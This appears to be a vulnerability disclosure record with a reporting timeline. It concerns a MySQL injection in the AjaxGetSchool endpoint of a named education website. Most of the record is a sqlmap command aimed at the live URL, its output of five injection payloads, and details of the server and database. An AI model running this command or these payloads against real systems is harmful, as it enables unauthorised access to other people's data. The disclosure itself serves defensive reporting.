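2015-01-20: Details reported to the vendor; awaiting vendor handling
2015-01-20: Vendor confirmed; details disclosed to the vendor only
2015-01-30: Details disclosed to core white hats and experts in related fields
2015-02-09: Details disclosed to regular white hats
2015-02-19: Details disclosed to intern white hats
2015-03-06: Details disclosed to the public
MySQL injection in a Xiwang (习网) system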
sqlmap.py -u "http://clbd.ciwong.com/CloudReader/Home/AjaxGetSchool" --data="areId=44"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: areId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: areId=44) AND 2015=2015 AND (6225=6225

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: areId=44) AND (SELECT 4939 FROM(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (CASE WHEN (4939=4939) THEN 1 ELSE 0 END)),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5046=5046

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: areId=44) UNION ALL SELECT 31,31,31,CONCAT(0x7162627171,0x6e4747434963714d786f,0x71716a7671),31,31#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: areId=44); SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: areId=44) AND SLEEP(5) AND (4895=4895
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
current user: 'ciwong_it@%'
available databases [136]:
See the detailed description.
Filtering.
Severity: High
Vulnerability Rank: 19
Confirmed: 2015-01-20 14:40
Vulnerability fix in progress...
None yet.